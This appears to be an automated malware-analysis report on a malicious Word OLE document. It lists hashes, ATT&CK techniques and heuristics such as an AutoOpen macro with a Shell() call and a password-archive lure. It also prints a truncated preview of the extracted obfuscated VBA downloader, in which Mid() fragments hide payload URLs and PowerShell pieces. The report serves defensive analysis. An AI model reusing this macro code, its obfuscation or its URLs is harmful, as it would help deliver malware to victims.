Office (OLE) malware analysis — malicious · bcfec6d15696c5b7

MALICIOUS

Office (OLE)

132.1 KB First seen: 2018-02-07

MD5: 2c48ce765abc460a4ac223fb8c121756 SHA-1: 972c1546ca21209734e0dbefaf84a89be76e3261 SHA-256: bcfec6d15696c5b79f5741e9b9f374246ad897bafc9b0f6ca2335004777b717d

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command, indicating an attempt to execute arbitrary code. The presence of a 'Password-protected archive handoff' heuristic suggests the document's purpose is to lure the user into handling a separate, encrypted payload. The reconstructed URL 'http://gXw+gXwtagXw+gXwswines.co' is likely part of the malicious infrastructure.

Heuristics 7

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 135,257 bytes but its declared streams total only 24,487 bytes — 110,770 bytes (82%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://gXw+gXwtagXw+gXwswines.co In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52881 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	52881 bytes
SHA-256: `4ff8e304e3d17e4b953a4806f2431a5822578f4d3d90633043913c794bca2217`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HpaCWEKWi" Function wbGowvEQG() jMhKzt = Array(StrReverse("oLGXEAjqiE"), StrReverse("jqaWvnIufr"), StrReverse("phbrROzqiG"), StrReverse("JBkTTumHkc"), StrReverse("DsrSTVkrwN"), StrReverse("obZhnHkOGq"), StrReverse("DqLcuiFGCB"), StrReverse("ABKDnwpIYw")) lVPYXfAmZC = Mid("Y+3MgXw+gXwciligXw+gXwk.gXw+gXwxyz/gXw3'+'Mg+3M'+'g+gXwSkRagptgXw+gX3Mg+3MgwdGgXw+gXw/,gXw+gXwhttp:gXw+gXw//rgXw+gXwandevu-gXw+gXwdk.rgX3Mg+3Mgw+gXwu'+'/q3Mg+3Mg/gXw+gXw,ht3Mg+3Mgtp://sagXw+gXwlgXuMv1FrYS60", 2, 195) BpBcRXwONUS = Array(StrReverse("kUKwEPuiTo"), StrReverse("AFMGtKhttj"), StrReverse("kFNBBvJBAd"), StrReverse("MPWmjqzWfB"), StrReverse("jnjIcZHzuc"), StrReverse("ZLifDfGJwI"), StrReverse("FsipckjaWC"), StrReverse("LKOsAwVFYc")) twStRjJzrpj = Array(StrReverse("dFtRSibCjM"), StrReverse("JXAtZNjPYl"), StrReverse("PiovMmQWtq"), StrReverse("RcqKNzwuJL"), StrReverse("GDZqrdAQia"), StrReverse("QaknhwQwFf"), StrReverse("SFJquhhqjb"), StrReverse("RmFNiMEwEj")) ioXOW = Array(StrReverse("juDjCYOAjS"), StrReverse("DYfUiTkEwh"), StrReverse("OiqspODMXV"), StrReverse("iwhUPbRNFw"), StrReverse("zDjSYOYzIC"), StrReverse("hsUaaCDKqo"), StrReverse("UCdOoGrKFH"), StrReverse("BXzChLuYUa")) zAEZZvWSqU = Mid("ZVaBzZ3AWYuWDX3Kiww-object randomgXw+3Mg+3MggXw;O3Mg+3MggXw+gXwAYbcd = taYhttp://gXw+gXwtagXw+gXwswines.co'+'.uk/AgXw+gXwFh/,htgXw+'+'gXwtp:gXw+gXw/gXw+gXwPm2HanXclsu4wnmtPTzQ7", 18, 138) OuzhKTW = Array(StrReverse("lzrTZqsCdO"), StrReverse("jwpitBtivK"), StrReverse("wKkCIdVWJV"), StrReverse("uStWtSNpQD"), StrReverse("oiNSvTzbTc"), StrReverse("SVDtmbPoKw"), StrReverse("VVtIUOETkb"), StrReverse("nDSrVRzSHp")) aioEDvUTd = Array(StrReverse("qFDUnlcHtM"), StrReverse("XHWRbwaViS"), StrReverse("XOsBAJsSsP"), StrReverse("IfqQwOzIaC"), StrReverse("djQskuAiak"), StrReverse("kYuCCcMCUd"), StrReverse("sKOiErQFSM"), StrReverse("zSvboozARG")) ELsVQow = Array(StrReverse("oiBrvTAMkG"), StrReverse("nolmNoCtFV"), StrReverse("oDXqXFYrmb"), StrReverse("LcbjYcQjDY"), StrReverse("ozpVnKcAHz"), StrReverse("wINjzkHKUq"), StrReverse("uIZJuLNCOk"), StrReverse("XTqjhpOBDM")) NjLrtmGcvoC = Mid("VTdTLivUVzjn984Qw+0wjh2nSiJt9r5I1", 17, 2) DpJSAIJu = Array(StrReverse("JKrIfklnNW"), StrReverse("BzowJSUmos"), StrReverse("duPNmSdSNO"), StrReverse("iMlNUiTGzU"), StrReverse("GcswLAiwRW"), StrReverse("TLMYcOuiVM"), StrReverse("GSawrpLabb"), StrReverse("zOmUlACSCm")) zAkpHhk = Array(StrReverse("cYkpdDOvlo"), StrReverse("VGOMifZjac"), StrReverse("zamWZiRjzH"), StrReverse("WFHHNWYjfr"), StrReverse("wSQZPREiCB"), StrReverse("PhbaPClNQz"), StrReverse("livdSQzHzH"), StrReverse("HpBiffJMHI")) DdJlNuqAd = Array(StrReverse("DLRdbVUzSz"), StrReverse("pUtTWCjGWK"), StrReverse("rKNUGkWawq"), StrReverse("sSLGNvSIhw"), StrReverse("rHtJSqfjIJ"), StrReverse("TcTNFtzwWr"), StrReverse("zuAbEXImFa"), StrReverse("jYYaTjRDBQ")) kwHZRoU = Mid("uO2rX476l6cXw +gXw+gXw tagXw+gXwYm2CtaY + OAYkgXw+gXwargnn", 12, 45) kizNO = Array(StrReverse("ZniwsodjsK"), StrReverse("kKTjGOWmHz"), StrReverse("Sziutajtuk"), StrReverse("sZFIZwDzld"), StrReverse("mSOoWwWUcR"), StrReverse("IXEIqcIjER"), StrReverse("HklIRLELHI"), StrReverse("KYAiMzjqYz")) PipKGCXI = Array(StrReverse("EqSmXQwwBU"), StrReverse("wVlqzzGRFv"), StrReverse("htaiZuEttV"), StrReverse("btvGmJbOEo"), StrReverse("ZKklcNnidW"), StrReverse("dzwGiKPkMc"), StrReverse("MEEfsEaiDn"), StrReverse("VsMRVXIpGM")) Ujbok = Array(StrReverse("sCrkswcvbV"), StrReverse("ANNictisCa"), StrReverse("PrdDTulVSX"), StrReverse("znjwPmXTVa"), StrReverse("qSYmlTKnzV"), StrReverse("SJAUJBZnQz"), StrReverse("NHcEYNjQPp"), StrReverse("WOXbjwSqSA")) WOjUzTGfzat = Mid("nuMsGPrzJi59bhWKJCsYIEdPt .( $ShELLII63Ft9iYXSQj", 26, 11) kWBCRnvF = Array(StrReverse("HVQWsbvoYb"), StrReverse("trBccUFFsX"), StrReverse("nIfpBknjkK"), StrReverse("CZdAUqoinQ"), StrReverse("ImGbudrkpA"), StrRev ... (truncated)

SHA-256: 4ff8e304e3d17e4b953a4806f2431a5822578f4d3d90633043913c794bca2217

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HpaCWEKWi"
Function wbGowvEQG()
jMhKzt = Array(StrReverse("oLGXEAjqiE"), StrReverse("jqaWvnIufr"), StrReverse("phbrROzqiG"), StrReverse("JBkTTumHkc"), StrReverse("DsrSTVkrwN"), StrReverse("obZhnHkOGq"), StrReverse("DqLcuiFGCB"), StrReverse("ABKDnwpIYw"))
lVPYXfAmZC = Mid("Y+3MgXw+gXwciligXw+gXwk.gXw+gXwxyz/gXw3'+'Mg+3M'+'g+gXwSkRagptgXw+gX3Mg+3MgwdGgXw+gXw/,gXw+gXwhttp:gXw+gXw//rgXw+gXwandevu-gXw+gXwdk.rgX3Mg+3Mgw+gXwu'+'/q3Mg+3Mg/gXw+gXw,ht3Mg+3Mgtp://sagXw+gXwlgXuMv1FrYS60", 2, 195)
BpBcRXwONUS = Array(StrReverse("kUKwEPuiTo"), StrReverse("AFMGtKhttj"), StrReverse("kFNBBvJBAd"), StrReverse("MPWmjqzWfB"), StrReverse("jnjIcZHzuc"), StrReverse("ZLifDfGJwI"), StrReverse("FsipckjaWC"), StrReverse("LKOsAwVFYc"))
twStRjJzrpj = Array(StrReverse("dFtRSibCjM"), StrReverse("JXAtZNjPYl"), StrReverse("PiovMmQWtq"), StrReverse("RcqKNzwuJL"), StrReverse("GDZqrdAQia"), StrReverse("QaknhwQwFf"), StrReverse("SFJquhhqjb"), StrReverse("RmFNiMEwEj"))
ioXOW = Array(StrReverse("juDjCYOAjS"), StrReverse("DYfUiTkEwh"), StrReverse("OiqspODMXV"), StrReverse("iwhUPbRNFw"), StrReverse("zDjSYOYzIC"), StrReverse("hsUaaCDKqo"), StrReverse("UCdOoGrKFH"), StrReverse("BXzChLuYUa"))
zAEZZvWSqU = Mid("ZVaBzZ3AWYuWDX3Kiww-object randomgXw+3Mg+3MggXw;O3Mg+3MggXw+gXwAYbcd = taYhttp://gXw+gXwtagXw+gXwswines.co'+'.uk/AgXw+gXwFh/,htgXw+'+'gXwtp:gXw+gXw/gXw+gXwPm2HanXclsu4wnmtPTzQ7", 18, 138)
OuzhKTW = Array(StrReverse("lzrTZqsCdO"), StrReverse("jwpitBtivK"), StrReverse("wKkCIdVWJV"), StrReverse("uStWtSNpQD"), StrReverse("oiNSvTzbTc"), StrReverse("SVDtmbPoKw"), StrReverse("VVtIUOETkb"), StrReverse("nDSrVRzSHp"))
aioEDvUTd = Array(StrReverse("qFDUnlcHtM"), StrReverse("XHWRbwaViS"), StrReverse("XOsBAJsSsP"), StrReverse("IfqQwOzIaC"), StrReverse("djQskuAiak"), StrReverse("kYuCCcMCUd"), StrReverse("sKOiErQFSM"), StrReverse("zSvboozARG"))
ELsVQow = Array(StrReverse("oiBrvTAMkG"), StrReverse("nolmNoCtFV"), StrReverse("oDXqXFYrmb"), StrReverse("LcbjYcQjDY"), StrReverse("ozpVnKcAHz"), StrReverse("wINjzkHKUq"), StrReverse("uIZJuLNCOk"), StrReverse("XTqjhpOBDM"))
NjLrtmGcvoC = Mid("VTdTLivUVzjn984Qw+0wjh2nSiJt9r5I1", 17, 2)
DpJSAIJu = Array(StrReverse("JKrIfklnNW"), StrReverse("BzowJSUmos"), StrReverse("duPNmSdSNO"), StrReverse("iMlNUiTGzU"), StrReverse("GcswLAiwRW"), StrReverse("TLMYcOuiVM"), StrReverse("GSawrpLabb"), StrReverse("zOmUlACSCm"))
zAkpHhk = Array(StrReverse("cYkpdDOvlo"), StrReverse("VGOMifZjac"), StrReverse("zamWZiRjzH"), StrReverse("WFHHNWYjfr"), StrReverse("wSQZPREiCB"), StrReverse("PhbaPClNQz"), StrReverse("livdSQzHzH"), StrReverse("HpBiffJMHI"))
DdJlNuqAd = Array(StrReverse("DLRdbVUzSz"), StrReverse("pUtTWCjGWK"), StrReverse("rKNUGkWawq"), StrReverse("sSLGNvSIhw"), StrReverse("rHtJSqfjIJ"), StrReverse("TcTNFtzwWr"), StrReverse("zuAbEXImFa"), StrReverse("jYYaTjRDBQ"))
kwHZRoU = Mid("uO2rX476l6cXw +gXw+gXw tagXw+gXwYm2CtaY + OAYkgXw+gXwargnn", 12, 45)
kizNO = Array(StrReverse("ZniwsodjsK"), StrReverse("kKTjGOWmHz"), StrReverse("Sziutajtuk"), StrReverse("sZFIZwDzld"), StrReverse("mSOoWwWUcR"), StrReverse("IXEIqcIjER"), StrReverse("HklIRLELHI"), StrReverse("KYAiMzjqYz"))
PipKGCXI = Array(StrReverse("EqSmXQwwBU"), StrReverse("wVlqzzGRFv"), StrReverse("htaiZuEttV"), StrReverse("btvGmJbOEo"), StrReverse("ZKklcNnidW"), StrReverse("dzwGiKPkMc"), StrReverse("MEEfsEaiDn"), StrReverse("VsMRVXIpGM"))
Ujbok = Array(StrReverse("sCrkswcvbV"), StrReverse("ANNictisCa"), StrReverse("PrdDTulVSX"), StrReverse("znjwPmXTVa"), StrReverse("qSYmlTKnzV"), StrReverse("SJAUJBZnQz"), StrReverse("NHcEYNjQPp"), StrReverse("WOXbjwSqSA"))
WOjUzTGfzat = Mid("nuMsGPrzJi59bhWKJCsYIEdPt .( $ShELLII63Ft9iYXSQj", 26, 11)
kWBCRnvF = Array(StrReverse("HVQWsbvoYb"), StrReverse("trBccUFFsX"), StrReverse("nIfpBknjkK"), StrReverse("CZdAUqoinQ"), StrReverse("ImGbudrkpA"), StrRev
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.